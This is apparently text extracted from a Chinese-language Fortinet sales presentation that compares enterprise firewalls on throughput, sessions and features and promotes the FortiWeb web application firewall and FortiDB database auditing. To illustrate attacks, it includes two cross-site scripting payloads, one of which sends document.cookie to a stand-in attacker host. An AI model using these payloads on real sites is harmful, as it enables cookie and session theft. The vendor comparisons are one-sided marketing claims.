104105高端萬兆防火墻競爭比較FortiGate3950B思科ASA5580-40JuniperSRX3600Junos10.1JuniperSRX5600Juos10.1JuniperSRX5800Juos10.1H3CSecpathF5000-A5華賽8080E/8160E防火墻性能20-120G20Gbps10-30Gbps10-60G(4SPC)10-120G(8SPC)40Gbps40/80GbpsPPS包轉發率178M4M6M7M(4SPC)15M(8SPC)N/A8-32M（4業務卡）/8-64M（8業務卡）并發會話10M2M1-2.25M9M(4SPC)10M(8SPC)4M4-16M(4業務卡）/4-32M(8業務卡)新建會話175,000（建立關閉）150，00050,000-175,000350,000(4SPC),只建立）350,000(4SPC),只建立）500,000250k-1M（4業務卡）/250k-2M(8業務卡)(只建立)IPSec性能8-48G1Gbps10Gbps15G(4SPC)30G(4SPC)N/A4-16G（4業務卡）4-32G(8業務卡）

IPS性能1.5G-10G(FMC卡)不支持10Gbps15G(4SPC)30G(4SPC)N/AN/A病毒掃描1.5Gbps（代理模式)不支持不支持不支持不支持不支持不支持虛擬域10-2500-50256（SecurityZones)256（SecurityZones)512（SecurityZones)5121024接口配置選擇2x10G,4xGigE,5xFMC槽位（可配2x10G接口卡）2x10/100/1000M管理口，6個接口槽（可配4x1G,2x10G接口卡)8x10/100/1000M接口，4個SFP1G,6個IOC接口槽（可配2×10G，16x1G接口卡）5個/接口IOC插槽，

（可配16×1G卡，40x1G卡，4x10G接口卡）11個接口IOC插槽，

（可配16×1G卡，40x1G卡，4x10G接口卡）4G個接口槽（12xGE(8電＋4光)卡,或者2x10G卡）

8個/16個擴展槽（可配5xGE,10xGE,,24xGE，1x10GE，POS)10G滿配接口12x10G12x10G12X10G20x10G44x10G8x10G8x10GFG5000ATCA集群式安全平臺性能線性擴展單卡吞吐量20G最大吞吐量160G并發會話8000萬新建會話80萬FortiGate-5060新安全平臺1078x加速10GESFP+端口2x標準10/100/1000端口內置64GBSSD1xUSB&1xconsole防火墻

-40Gbps（小包）

IPSECVPN-17Gbps病毒檢測–

1.5Gbps新建會話

–10萬

并發會話-

1100萬最大VDOM-2505000萬并發會話50萬新建會話7.5G病毒檢測FortiSwitch-5003B負載均衡卡5001B安全處理卡108競爭分析：硬件平臺技術比較廠商描述技術特點30B/wifi30B,50B/HD,Wifi50B,80C/CM,110C/HD,310B,620B,3016B,3600A,3810A,5020,5050,5140

ASIC-NP+CP專用硬件加速內容層和網絡層SSG5,20,140,320,350,520,550SRX210,240,650,3400,3600,5400,5800無加速技術ASA5505,5510,5520,5540,5550,5580無加速技術U200S,U200M,U200A無加速技術109競爭分析：安全虛擬化能力安全功能備注防火墻VPNIPS病毒Web過濾垃圾郵件各項功能均支持虛擬化-VDOMVirtualSystems(VSYS)UTM功能不支持虛擬化VirtualSystems(VSYS)UTM功能不支持虛擬化VirtualSystems(VSYS)UTM功能不支持虛擬化110競爭分析：集中管理能力安全功能備注防火墻VPNIPS病毒Web過濾垃圾郵件唯一提供全功能集中管理能力的廠商需要第三方管理平臺來管理防病毒、Web過濾和反垃圾郵件需要第三方管理平臺來管理防病毒、Web過濾和反垃圾郵件需要第三方管理平臺來管理防病毒、Web過濾和反垃圾郵件111競爭分析：業界認證安全功能備注FWVPNIPSAVICSAV4.1,EAL4+ICSAV1.2+V2.0(SSL)Yes+NSSYesFortiGate擁有業界最多的ICSA認證，唯一獲得沒有獲得的NSS測試機構的UTM認證。ICSAV4.0,EAL4+YesAV認證是TrendMicro的ICSAV4.0,EAL4+ICSAV1.2YesAV認證是TrendMicro的112競爭分析：安全服務入侵防御反病毒、反間諜軟件Web過濾反垃圾郵件應用控制FortiGuard服務廠家自有技術OEM/第三方合作X-UTM需要完善的內容防御功能和持續統一的安全服務KaperskySurfControlJuniperSymantectrendmicroironportCiscoironport第三方H3C113FortiWeb

應用防火墻Web應用是什么?Web應用是公開的、面對internet的應用使用標準的瀏覽器訪問，提供Web郵件、在線零售、在線拍賣、wikis以及許多其它功能為企業提供電子商務及商業推動工具

Web應用的編寫是為了高效的傳輸內容在多數情況下，Web應用的安全性不是開發人員優先考慮的部分開放的應用有可能會暴露敏感信息攻擊由簡單的破壞逐步轉變為信用卡和其它個人身份信息竊取銀行Web服務器數據中心113數據庫服務器前端Web服務器業務數據中心邊緣跨站腳本/釣魚攻擊SQL注入，執行命令弱口令，暴力破解數據與審計日志竄改 溢出攻擊，權限提升114安恒機密.|114跨站攻擊獲取COOKIE利用腳本加載一個JS文件，動態創建一個script標記：<TABLEBACKGROUND=javascript:s=document.createElement("script");s.src="/xss.js";document.body.appendChild(s);>

當用戶瀏覽貼子時，用戶瀏覽器將自動執行上的xss.js腳本利用JS文件指向其它網站當用戶瀏覽貼子時，用戶瀏覽器將跳轉到另一頁面(如虛假登錄頁面)115Web應用防火墻進行Web應用層分析，透徹理解具體應用并攔截滲透性威脅

傳統防火墻檢測網絡攻擊檢查IP和端口，不能識別應用類型IPS產品只能檢測已知的攻擊類型

逃避特殊檢測非常容易，不能對SSL流量進行保護，不能識別應用類型不能識別用戶，誤判率高115網絡訪問(OSI1–3層)協議(OSI4–7層)網絡層應用層網絡防火墻IPS及深度包檢測防火墻Web應用防火墻FortiWeb

Web應用防火墻的特點116手工實現應用安全配置？管理員需要手動指定：每一個URL、目錄、參數、字段長度和類型。動態內容、JavaScript、XML等的正則表達式不斷的升級白名單高誤判率–不匹配白名單的流量將被阻止

116117FortiWeb–Web應用防火墻117協議規范驗證數據泄漏防護自學習和驗證規則應用程序攻擊簽名庫身份驗證策略設備名稱機架式設備HTTP事務處理/秒吞吐量本地存儲FortiWeb-400B1U

機架設備10,000100Mb/秒0.5TB標配FortiWeb-1000C1U

機架設備27,000500Mb/秒1TB標配，2TB可選FortiWeb-3000C2U

機架設備40，0001Gb/秒2TB標配，4TB可選ICSAWeb應用防火墻認證119在線透明橋模式方便部署，全透明或者傍路支持在線阻擋攻擊反向代理模式

支持請求和服務器回應的內容改寫完全支持HTTPS內容安全掃描支持HTTPS應用優化流量負載均衡旁路部署–

鏡像接口零網絡延遲通過TCPreset阻擋攻擊用于最初產品評估,非侵入式網絡部署

FortiWeb靈活的部署方式

Web業務應用系統網銀

門戶FortiWeb在線部署FortiWeb傍路部署120邏輯規則自學習功能根據自學習結果，自動生成配置學習到的網站結構網頁表單各項參數學習被保護應用程序的結構URLs參數已知的行為分析訪問攻擊提供自動生成規則可輸出為PDF文件121Web安全簽名庫技術由全球FortiGuard云安全網絡提供服務，發現漏洞后，自動更新簽名庫規則，維護簡單，內置6000條HTTP訪問規則，自動匹配應用邏輯算法,全面檢測web訪問應用數據,動態安全防御體系<SCRIPT>Document.location=‘http://attackerhost.example/cg-bin/

getcookie.cgi?’+document.cookie</SCRIPT>122應用參數邏輯規則檢測FortWEB可對受保護的WEB站點進行URL級別控制，針對各種頁面定制個性化規則，支持條自定義頁面規則5000-8000網頁上未加限制的字符輸入框，容易受到腳本及注入攻擊123防御暴力破解FortWEB可以針對指定網頁的訪問頻率，超過閾值將被阻止，有效的防止滲透者對關鍵頁面暴力破解。124網頁防篡改FortiWeb可以發現被入侵或篡改的網頁被篡改的網頁可以自動或手動恢復125內置Web服務應用掃描器方便的掃描應用程序，發現Web漏洞常見的漏洞SQL注入、跨站攻擊及其它125有助于PCIDSS6.6合規圖形化報表126SSL安全加密FortiWeb可對原有明文HTTP流量進行SSL加密，SSL加密密鑰支持內置及客戶自生成證書，服務器運行原有HTTP業務，由FortWEB“裝載”了SSL協商過，此過程FortiASICCP6

芯片進行SSL的加/解密運算，WebServersClientHTTPSSSLComputationPCIe

加速卡CP6可加速SSL處理板載Flash存儲用來嵌入系統系列號及數字認證127圖形報告審計128銀行應用案例129內部用戶合法權限濫用權限盜用越權濫用權限分配不當臨時帳號未及時清理備份數據缺乏保護離職員工的后門合作伙伴合法權限濫用權限盜用越權濫用后門程序DB2/SQL/Oracle/Sybase數據庫軟件數據庫平臺漏洞通訊協議漏洞弱鑒權機制日志缺失或不完整

4W：-是誰，做了什么-什么時候，在哪里跟蹤：-登錄-數據/文件訪問-數據/文件變化-模式變化-日志竄改-人為錯誤-可疑的活動-自定義事件FortiDB數據庫掃描和審計系統130FortinetConfidential 掃描安全隱患-提供修補建議

內建最優方案

和/或用戶自有標準

持續掃描系統中的每一個數據庫

漏洞掃描自動創建正常訪問行為基準

不斷掃描使用者的可疑行為

可疑數據訪問報警

模板監控審計對用戶權限變化、對象/schema變化、數據訪問、數據更新事件等提供完整歷史記錄

向數據庫管理員、信息安全管理員、審計員審計/法律依從性報告完善的安全掃描和日常數據審計131FortinetConfidential 關鍵特性對漏洞進行評估，并提供業界標準修補建議，以加固數據庫的完整性和安全性。這項特性將幫助排除密碼、存取、權限、配置設定等方面的弱點。

自動發現所有的數據庫。加速安全及法規順應性建設。(PCI,SOX,HIPAA)集中特征及策略管理。職責劃分。易于創建客戶自定義特征及策略。便于識別的報表專家級修復建議分析數據庫安全趨勢支持多種數據庫

(Oracle、SQL、DB2UDB、Sybase)數據庫漏洞評估132用戶行為監控減少系統數據信息泄露、攻擊、篡改的